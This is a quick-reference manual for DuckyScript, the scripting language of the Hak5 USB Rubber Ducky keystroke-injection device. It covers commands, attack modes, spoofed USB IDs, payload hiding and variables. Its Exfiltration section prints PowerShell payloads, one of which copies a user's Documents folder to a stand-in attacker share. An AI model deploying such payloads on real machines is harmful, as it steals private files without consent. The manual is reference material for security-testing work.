DuckyScript™ Quick Reference

DuckyScript™ is the programming language of the USB Rubber Ducky™, Hak5® hotplug attack gear and officially licensed devices (Trademark Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved.)

DuckyScript™ officially licensed and supported devices are backwards compatible with previous versions, excluding any device specific functionality.

E.g. DuckyScript™ 1.0 payloads written for the USB Rubber Ducky are valid DuckyScript™ 3.0 and will function on the New USB Rubber Ducky without modification

DuckyScript™ VersionDevice Compatibility

1.0

Original USB Rubber Ducky (USB-A Only)

2.X

Bash Bunny, Key Croc, Packet Squirrel, LAN Turtle, Shark Jack, O.MG Devices

3.0

New USB Rubber Ducky (USB-A & USB-C)

DuckyScript includes commands/syntax which only work on some devices. For example, MATCH and SAVEKEYS are DuckyScript™ commands which are only for Key Croc payloads and will not work on other devices.

Hak5 does NOT guarantee payload functionality for unlicensed device's, or payloads NOT compiled using Hak5 PayloadStudio

Comments

REM

The REM command does not perform any keystroke injection functions. REM gets its name from the word remark. While REM may be used to add vertical spacing within a payload, blank lines are also acceptable and will not be processed by the compiler.

REM This is a comment

REM_BLOCK

Defining a comment block is simple! Start the comment with REM_BLOCK and end the comment with END_REM; everything in between will be considered a comment without the need to prepend every new line with REM. Comment blocks can be especially useful when you have multiple lines to be included in a single comment or want to retain formatting.

REM_BLOCK DOCUMENTATION
        USAGE:
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
    
        TARGETS:
            Any system that reflects CAPSLOCK will detect minimum required delay
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

Keystroke Injection

STRING

The STRING command keystroke injects (types) a series of keystrokes. STRING will automatically interpret uppercase letters by holding the SHIFT modifier key where necessary. The STRING command will also automatically press the SPACE cursor key, however trailing spaces will be omitted.

STRING The quick brown fox jumps over the lazy dog

STRINGLN

The STRINGLN command, like STRING, will inject a series of keystrokes then terminate with a carriage return (ENTER).

STRINGLN      _      _      _      USB       _      _      _
STRINGLN   __(.)< __(.)> __(.)=   Rubber   >(.)__ <(.)__ =(.)__
STRINGLN   \___)  \___)  \___)    Ducky!    (___/  (___/  (___/

STRING Blocks

STRING Blocks

STRING blocks can be used effectively to convert multiple lines into one without needing to prepend each line with STRING

STRING blocks strip leading white space and ignore new lines!

STRING
    a
    b
    c
END_STRING

is the equivalent of 

STRING a
STRING b
STRING c

Or in this case: STRING abc

STRINGLN Blocks

STRINGLN blocks can be used like here-doc; allowing you to inject multiple lines as they are written in the payload.

STRINGLN blocks strip the first tab but will preserve all other formatting

STRINGLN
    a
    b
    c
END_STRINGLN

is the equivalent of

STRINGLN a
STRINGLN b
STRINGLN c

Result

Deploying this payload will produce the following keystroke injection on the target machine:

a
b
c

Cursor Keys

The cursor keys are used to navigate the cursor to a different position on the screen.

UP DOWN LEFT RIGHT

UPARROW DOWNARROW LEFTARROW RIGHTARROW

PAGEUP PAGEDOWN HOME END

INSERT DELETE DEL BACKSPACE

TAB

SPACE

System Keys

System keys are primarily used by the operating system for special functions and may be used to interact with both text areas and navigating the user interface.

ENTER

ESCAPE

PAUSE BREAK

PRINTSCREEN

MENU APP

F1 F2 F3 F4 F5 F6 F7 F8 F9 F0 F11 F12

Basic Modifier Keys

Modifier keys held in combination with another key to perform a special function. Common keyboard combinations for the PC include the familiar CTRL c for copy, CTRL x for cut, and CTRL v for paste.

SHIFT

ALT

CONTROL or CTRL

COMMAND

WINDOWS or GUI

REM Windows Modifier Key Example

REM Open the RUN Dialog
GUI r

REM Close the window
ALT F4

Key and Modifier Combos

In addition to the basic modifier key combinations, such as CTRL c, modifiers and keys may be combined arbitrarily.

CTRL SHIFT

ALT SHIFT

COMMAND CTRL

COMMAND CTRL SHIFT

COMMAND OPTION

COMMAND OPTION SHIFT

CONTROL ALT DELETE

CTRL ALT DELETE

Standalone Modifier Keys

Injecting a modifier key alone without another key — such as pressing the WINDOWS key — may be achieved by prepending the modifier key with the INJECT_MOD command.

REM Example pressing Windows key alone

INJECT_MOD WINDOWS

Lock Keys

Lock keys toggle the lock state (on or off) and typically change the interpretation of subsequent keypresses. For example, caps lock generally makes all subsequent letter keys appear in uppercase.

CAPSLOCK

NUMLOCK

SCROLLOCK

Delays

DELAY

The DELAY command instructs the USB Rubber Ducky to momentarily pause execution of the payload. This is useful when deploying a payload which must "wait" for an element — such as a window — to load. The DELAY command accepts the time parameter in milliseconds.

DELAY for 100 milliseconds (one tenth of a second)
DELAY 100

The minimum delay value is 20.

The DELAY command may also accept an integer variable.

VAR $WAIT = 500
DELAY $WAIT

DELAY timings might differ slightly depending on the ATTACKMODE the USB Rubber Ducky is in when executing the DELAY and depending on the target host.

The Button

By default, if no other button command is currently in use, pressing the button during payload execution will make the USB Rubber Ducky stop any further keystroke injection. It will then become an ordinary USB flash drive, commonly referred to as "arming mode".

WAIT_FOR_BUTTON_PRESS

Halts payload execution until a button press is detected. When this command is reached in the payload, no further execution will occur.

STRING Press the button...
WAIT_FOR_BUTTON_PRESS
STRING The button was pressed!

BUTTON_DEF

The BUTTON_DEF command defines a function which will execute when the button is pressed anytime within the payload so long as the button control is not already in use by the WAIT_FOR_BUTTON_PRESS command or other such function.

BUTTON_DEF
    STRINGLN The button was pressed.
END_BUTTON

STRINGLN Press the button with the next 10 seconds
DELAY 10000

DISABLE_BUTTON

The DISABLE_BUTTON command prevents the button from calling the BUTTON_DEF.

ENABLE_BUTTON

The ENABLE_BUTTON command allows pressing the button to call the BUTTON_DEF.

The LED

The USB Rubber Ducky includes an LED which may be helpful when deploying certain payloads where feedback is important.

LED_OFF

The LED_OFF command will disable all LED modes.

LED_R

The LED_R command will enable the red LED.

LED_G

The LED_G command will enable the green LED.

ATTACKMODE

An attack mode is the device type that a USB Rubber Ducky, is functioning as or emulating. If no ATTACKMODE command is specified as the first command (excluding REM), the HID attack mode will execute, allowing the device to function as a keyboard. The ATTACKMODE command may be run multiple times within a payload, which may cause the device to be re-enumerated by the target if the attack mode changes.

Required Parameters

ATTACKMODE ParameterDescription

HID

Functions as a Human Interface Device, or Keyboard, for keystroke injection.

STORAGE

Functions as USB Mass Storage, or a Flash Drive, for copying files to/from the target.

HID STORAGE

Functions as both USB Mass Storage and Human Interface Device

OFF

Will not function as any device. May be used to disconnect the device from the target.

ATTACKMODE HID STORAGE
REM The USB Rubber Ducky will act as both a flash drive and keyboard

Optional Parameters

When using these optional parameters, VID and PID must be used as a set. Further, MAN, PROD and SERIAL must also be used as a set.

ATTACKMODE ParameterDescription

VID_

Vendor ID (16-bit HEX)

PID_

Product ID (16-bit HEX)

MAN_

Manufacturer (32 alphanumeric characters)

PROD_

Product (32 alphanumeric characters)

SERIAL_

Serial (12 digits)

ATTACKMODE HID VID_046D PID_C31C MAN_HAK5 PROD_DUCKY SERIAL_1337
REM Emulated a Keyboard with the following values:
REM  - Vendor ID: 046D
REM  - Product ID: C31C
REM  - Manufacturer: HAK5
REM  - Product: DUCKY
REM  - Serial: 1337

SAVE_ATTACKMODE

The SAVE_ATTACKMODE command will save the currently running ATTACKMODE state (including any specified VID, PID, MAN, PROD and SERIAL parameters) such that it may be later restored.

RESTORE_ATTACKMODE

The RESTORE_ATTACKMODE command will restore a previously saved ATTACKMODE state.

ATTACKMODE HID VID_046D PID_C31C MAN_HAK5 PROD_DUCKY SERIAL_1337
DELAY 2000
SAVE_ATTACKMODE
STRING Hello
ATTACKMODE OFF
DELAY 5000
RESTORE_ATTACKMODE
DELAY 2000
STRING , World!

Constants

DEFINE

The DEFINE command is used to define a constant. One may consider the use of a DEFINE within a payload like a find-and-replace at time of compile.

DEFINE #WAIT 2000
DEFINE #TEXT Hello World
DEFINE #MYURL example.com
DELAY #WAIT
STRINGLN #TEXT
STRING https://#MYURL

Variables

VAR

The VAR command will initiate a variable. Unlike constants, variables begin with a dollar sign ("$"). Variables contain unsigned integers with values from 0 to 65535. Booleans may be represented as well, either by TRUE/FALE or any non-zero number and 0 respectively.

VAR $BLINK = TRUE
VAR $BLINK_TIME = 1000

Operators

Operators instruct the payload to perform a given mathematical, relational or logical operation.

Math

OperatorMeaning

=

Assignment

+

Add

-

Subtract

*

Multiply

/

Divide

%

Modulus

^

Exponent

VAR $FOO = 1337
$FOO = ( $FOO - 1295 )
REM $FOO was assigned 1337, subtracted 1295, and ended up equalling 42.

Comparison

Will compare two values to evaluate a single boolean value.

OperatorMeaning

==

Equal to

!=

Not equal to

>

Greater than

<

Less than

>=

Greater than or equal to

<=

Less than or equal to

VAR $FOO = 42
VAR $BAR = 1337
IF ( $FOO < $BAR ) THEN
    STRING 42 is less than 1337
END_IF

Order of Operations

Parentheses ( ) are required to define the precedence conventions.

VAR $FOO = 42
VAR $BAR = (( 100 * 13 ) + ( $FOO - 5 ))

Logical Operators

Logical operators may be used to connect two or more expressions.

OperatorDescription

&&

Logical AND. If both the operands are non-zero, the condition is TRUE.

||

Logical OR. If any of the two operands is non-zero, the condition is TRUE.

VAR $FOO = 42
VAR $BAR = 1337
IF ( $FOO < $BAR ) || ( $BAR == $FOO ) THEN
    STRING Either 42 is less than 1337 or 42 is equal to 1337
END_IF

Augmented Assignment

When assigning a value to a variable, the variable itself may be referenced.

VAR $FOO = 1336
VAR $FOO = ( $FOO + 1 )

Bitwise Operators

Operate on the uint16 values at the binary level.

OperatorDescription

&

Bitwise AND. If the corresponding bits of the two operands is 1, will result in 1. Otherwise if either bit of an operand is 0, the result of the corresponding bit is evaluated as 0.

|

Bitwise OR. If at least one corresponding bit of the two operands is 1, will result in 1.

>>

Right Shift. Accepts two numbers. Right shifts the bits of the first operand. The second operand determines the number of places to shift.

<<

Left Shift. Accepts two numbers. Left shifts the bits of the first operand. The second operand decides the number of places to shift.

ATTACKMODE HID STORAGE VID_05AC PID_021E
VAR $FOO = $_CURRENT_VID
REM Because VID and PID parameters are little endian, 
$FOO = ((($FOO >> 8) & 0x00FF) | (($FOO << 8) & 0xFF00))
REM $FOO will now equal 0xAC05

Conditional Statements

Conditional statements, loops and functions allow for dynamic execution.

IF

The flow control statement IF will determine whether or not to execute its block of code based on the evaluation of an expression. One way to interpret an IF statement is to read it as "IF this condition is true, THEN do this".

$FOO = 42
$BAR = 1337
IF ( $FOO < $BAR ) THEN
  STRING 42 is less than 1337
END_IF

ELSE

The ELSE statement is an optional component of the IF statement which will only execute when the IF statement condition is FALSE.

IF ( $_CAPSLOCK_ON == TRUE ) THEN
    STRING Capslock is on!
ELSE IF ( $_CAPSLOCK_ON == FALSE ) THEN
    STRING Capslock is off!
END_IF

Loops

Loops are flow control statements that can be used to repeat instructions until a specific condition is reached.

WHILE

The block of code within the WHILE statement will continue to repeatedly execute for a number of times (called iterations) for as long as the condition of the WHILE statement is TRUE. 

VAR $FOO = 42
WHILE ( $FOO > 0 )
    STRINGLN This message will repeat 42 times.
    $FOO = ( $FOO - 1 )
END_WHILE

WHILE TRUE
    SRINGLN This is an infinite loop. This message repeats forever.
END_WHILE

Functions

Functions are blocks of organized single-task code that let you more efficiently run the same code multiple times without the need to copy and paste large blocks of code over and over again.

FUNCTION

REM Types "Hello.....World!"

FUNCTION COUNTDOWN()
    WHILE ($TIMER > 0)
        STRING .
        $TIMER = ($TIMER - 1)
        DELAY 500
    END_WHILE
END_FUNCTION

STRING Hello
VAR $TIMER = 5
COUNTDOWN()
STRING World!

RETURN

A function may return a integer or boolean value which may also be evaluated.

FUNCITON TEST_CAPS_AND_NUM()
    IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == TRUE)) THEN
        RETURN TRUE
    ELSE
        RETURN FALSE
    END_IF
END_FUNCTION

IF (TEST_CAPS_AND_NUM() == TRUE) THEN
    STRINGLN Caps lock and num lock are on.
END_IF

Randomization

The pseudorandom number generator provides randomization for keystroke injection, variables and attackmode parameters. The first time a randomization feature is used, a seed.bin will be generated on the root of the MicroSD card. One may also be generated from the Hak5 IDE.

Random Keystroke Injection

CommandCharacter Set

RANDOM_LOWERCASE_LETTER

abcdefghijklmnopqrstuvwxyz

RANDOM_UPPERCASE_LETTER

ABCDEFGHIJKLMNOPQRSTUVWXYZ

RANDOM_LETTER

abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ

RANDOM_NUMBER

0123456789

RANDOM_SPECIAL

!@#$%^&*()

RANDOM_CHAR

abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789 !@#$%^&*()

REM 42 random characters
VAR $COUNT = 42
WHILE ($COUNT > 0)
    RANDOM_CHAR
    $COUNT = ($COUNT + 1)
END_WHILE

Random Integers

The internal variable $_RANDOM_INT assigns a random integer between the specified $_RANDOM_MIN and $_RANDOM_MAX values. May be 0-65535. The default values are 0-9. 

$_RANDOM_MIN = 42
$_RANDOM_MAX = 1337
VAR $FOO = $_RANDOM_INT

REM The variable $FOO will be between 42 and 1337

Random and ATTACKMODE

The ATTACKMODE command may accept random values for the optional parameters.

ATTACKMODE ParameterResult

VID_RANDOM

Random Vendor ID

PID_RANDOM

Random Product ID

MAN_RANDOM

Random 12 alphanumeric character iManufacturer

PROD_RANDOM

Random 12 alphanumeric character iProduct

SERIAL_RANDOM

Random 12 digit serial number

ATTACKMODE HID VID_RANDOM PID_RANDOM MAN_RANDOM PROD_RANDOM SERIAL_RANDOM

Use caution when using random VID and PID values as unexpected results are likely.

Holding Keys

A key may be held, rather than pressed, by specifying a HOLD and RELEASE command with a DELAY in between the two. Both HOLD and RELEASE must specify a key. Multiple simultaneous keys may be held.

HOLD a
DELAY 2000
RELEASE a

REM May produce any mumber of "aaaaa" keys, depending on the repeat rate of
REM the target OS. On macOS may open the accent menu.

INJECT_MOD
HOLD WINDOWS
DELAY 4000
RELEASE WINDOWS

REM Will hold the Windows key for 4 seconds. Note the use of INJECT_MOD
REM when using a modifier key without a key combination.

Payload Control

These simple commands exist to control the execution of a payload.

RESTART_PAYLOAD

The RESTART_PAYLOAD command ceases execution, restarting the payload from the beginning.

STOP_PAYLOAD

The STOP_PAYLOAD command ceases and further execution.

RESET

The RESET command clears the keystroke buffer, useful for debugging complex hold key states.

Jitter

Jitter randomly varies the delay between individual key presses based on the seed.bin value.

Internal VariableDescription

$_JITTER_ENABLED

Set TRUE to enable and FALSE to disable jitter.

$_JITTER_MAX

Integer (0-65535) of maximum time in milliseconds between keystrokes. Default 20. 

$_JITTER_MAX = 60
$_JITTER_ENABLED = TRUE
STRINGLN The quick brown fox jumps over the lazy dog

Payload Hiding

The inject.bin and seed.bin file may be hidden from the MicroSD card before implementing ATTACKMODE STORAGE. The HIDE_PAYLOAD and RESTORE_PAYLOAD commands must be run while using ATTACKMODE OFF or ATTACKMODE HID.

HIDE_PAYLOAD

Hides the inject.bin and seed.bin files from the MicroSD card.

RESTORE_PAYLOAD

Restores the inject.bin and seed.bin files to the MicroSD card.

ATTACKMODE OFF
HIDE_PAYLOAD
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN The payload files are hidden.
ATTACKMODE HID
RESTORE_PAYLOAD
DELAY 2000
STRINGLN Restoring the payload files...
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN The payload files have been restored.

Lock Keys

USB HID devices contain both IN endpoints for data (keystrokes) from the keyboard to computer, and OUT endpoints for data (LED states) from the computer to the keyboard. In many cases the LED state control codes sent from the computer to the attached keyboard are sent to all attached "keyboards". Versions of macOS behave differently.

WAIT_FOR Commands

CommandDescription

WAIT_FOR_CAPS_ON

Pause until caps lock is turned on

WAIT_FOR_CAPS_OFF

Pause until caps lock is turned off

WAIT_FOR_CAPS_CHANGE

Pause until caps lock is toggled on or off

WAIT_FOR_NUM_ON

Pause until num lock is turned on

WAIT_FOR_NUM_OFF

Pause until num lock is turned off

WAIT_FOR_NUM_CHANGE

Pause until num lock is toggled on or off

WAIT_FOR_SCROLL_ON

Pause until scroll lock is turned on

WAIT_FOR_SCROLL_OFF

Pause until scroll lock is turned off

WAIT_FOR_SCROLL_CHANGE

Pause until scroll lock is toggled on or off

STRINGLN Hello,
STRINGLN [Press caps lock to continue...]
WAIT_FOR_CAPS_CHANGE
STRINGLN World!

SAVE and RESTORE Commands

The currently reported lock key states may be saved and later recalled using the SAVE_HOST_KEYBOARD_LOCK_STATE and RESTORE_HOST_KEYBOARD_LOCK_STATE commands. 

REM Save the LED states of the primary keyboard
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Change the lock states
CAPSLOCK
NUMLOCK
REM Restore the original lock states
RESTORE_HOST_KEYBOARD_LOCK_STATE

Exfiltration

Exfiltration is the unauthorized transfer of information from a system. Typically performed over a physical medium (copying to a USB flash disk such as the USB Rubber Ducky while using ATTACKMODE STORAGE) or a network medium such as email, ftp, smb, http, etc.

Physical Exfiltration Example

ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRINGLN echo $env:computername >> $m:\computer_names.txt"

Network Exfiltration Example

ATTACKMODE HID
DELAY 2000
GUI r
DELAY 100
STRINGLN powershell "cp -r $env:USERPROFILE\Documents\* \\evilsmb\share"

Keystroke Reflection

By taking advantage of the HID OUT endpoint as described in the lock keys section, binary data may be exfiltrated "out of band" using the Keystroke Reflection side-channel attack. This is done by using the $_EXFIL_MODE_ENABLED internal variable. The reflected lock keystrokes are saved to loot.bin on the root of the MicroSD card. For a detailed example, see the section on Keystroke Reflection.

Variable Exfiltration

Similarly, arbitrary variable data may be saved to the loot.bin file using the EXFIL command.

VAR $FOO = 1337
EXFIL $FOO

Internal Variables

Internal VariableDescription

BUTTON

$_BUTTON_ENABLED

Returns TRUE if the button is enabled or FALSE if the button is disabled.

$_BUTTON_USER_DEFINED

Returns TRUE if a BUTTON_DEF has been implemented in the payload or FALSE if it hasn't been implemented.

$_BUTTON_PUSH_RECEIVED

Returns TRUE if the button has ever been pressed. May be retrieved or set.

$_BUTTON_TIMEOUT

The button debounce, or cooldown time before counting the next button press, in milliseconds. The default value is 1000.

LED

$_SYSTEM_LEDS_ENABLED

Default set TRUE. May be retrieved or set. Boot and ATTACKMODE change LED.

$_STORAGE_LEDS_ENABLED

Default set TRUE. May be retrieved or set.

Blinks the LED red/green on storage read/write in ATTACKMODE STORAGE.

$_LED_CONTINUOUS_SHOW_STORAGE_ACTIVITY

Default set TRUE. May be retrieved or set.

The LED will light solid green when the storage has been inactive for longer than $_STORAGE_ACTIVITY_TIMEOUT (default 1000 ms). Otherwise, the LED will light red when active.

$_INJECTING_LEDS_ENABLED

Default set TRUE. May be retrieved or set. When TRUE the LED will blink green on payload execution.

$_EXFIL_LEDS_ENABLED

Default set TRUE. May be retrieved or set. When TRUE the LED will blink green during Keystroke Reflection.

$_LED_SHOW_CAPS

Default set FALSE. May be retrieved or set. When TRUE will bind the GREEN LED state to the CAPSLOCK state.

$_LED_SHOW_NUM

Default set FALSE. May be retrieved or set. When TRUE will bind the RED LED state to the NUMLOCK state.

$_LED_SHOW_SCROLL

Default set FALSE. May be retrieved or set. When TRUE will bind the GREEN LED state to the SCROLLLOCK state.

ATTACKMODE

$_CURRENT_VID

Returns the currently operating Vendor ID with endian swapped. May only be retrieved. Cannot be set.

$_CURRENT_PID

Returns the currently operating Product ID with endian swapped. May only be retrieved. Cannot be set.

$_CURRENT_ATTACKMODE

Returns the currently operating ATTACKMODE represented as 0 for OFF, 1 for HID, 2 for STORAGE and 3 for both HID and STORAGE

RANDOM

$_RANDOM_INT

Random integer within set range.

$_RANDOM_MIN

Random integer minimum range (unsigned, 0-65535)

$_RANDOM_MAX

Random integer maximum range (unsigned, 0-65535)

$_RANDOM_SEED

Random seed from seed.bin

$_RANDOM_LOWER_LETTER_KEYCODE

Returns random lower letter scancode (a-z)

$_RANDOM_UPPER_LETTER_KEYCODE

Returns random upper letter scancode (A-Z)

$_RANDOM_LETTER_KEYCODE

Returns random letter scancode (a-zA-Z)

$_RANDOM_NUMBER_KEYCODE

Returns random number scancode (0-9)

$_RANDOM_SPECIAL_KEYCODE

Returns random special char scancode (shift+0-9)

$_RANDOM_CHAR_KEYCODE

Returns random letter number or special scancode

JITTER

$_JITTER_ENABLED

Set TRUE to enable jitter. Default FALSE.

$_JITTER_MAX

Sets the maximum time between key presses in milliseconds. The default maximum is 20 ms.

LOCK KEYS

$_CAPSLOCK_ON

TRUE if on, FALSE if off.

$_NUMLOCK_ON

TRUE if on, FALSE if off.

$_SCROLLLOCK_ON

TRUE if on, FALSE if off.

$_SAVED_CAPSLOCK_ON

On USB attach or SAVE_HOST_KEYBOARD_LOCK_STATE, sets TRUE or FALSE depending on the reported OS condition.

$_SAVED_NUMLOCK_ON

On USB attach or SAVE_HOST_KEYBOARD_LOCK_STATE, sets TRUE or FALSE depending on the reported OS condition.

$_SAVED_SCROLLLOCK_ON

On USB attach or SAVE_HOST_KEYBOARD_LOCK_STATE, sets TRUE or FALSE depending on the reported OS condition.

$_RECEIVED_HOST_LOCK_LED_REPLY

On receipt of any lock state LED control code, sets TRUE. This flag is helpful for fingerprinting certain operating systems (e.g. macOS) or systems which do not reflect lock keys.

STORAGE

$_STORAGE_ACTIVITY_TIMEOUT

As payload is running, this value decrements if storage activity is not detected. Default value is 1000.

EXFILTRATION

$_EXFIL_MODE_ENABLED

Default FALSE. Set TRUE to enable Keystroke Reflection. Will listen for CAPSLOCK and NUMLOCK changes, writing binary values to loot.bin. num=1, caps=0.

OS_DETECT

$_HOST_CONFIGURATION_REQUEST_COUNT

Used by OS_DETECT EXTENSION to detect device enumeration count.

$_OS

Used by OS_DETECT EXTENSION to return value of fingerprinted operating system. May return WINDOWS, MACOS, LINUX, CHROMEOS, ANDROID, IOS. These names are reserved and should not be used in user variables.

Last updated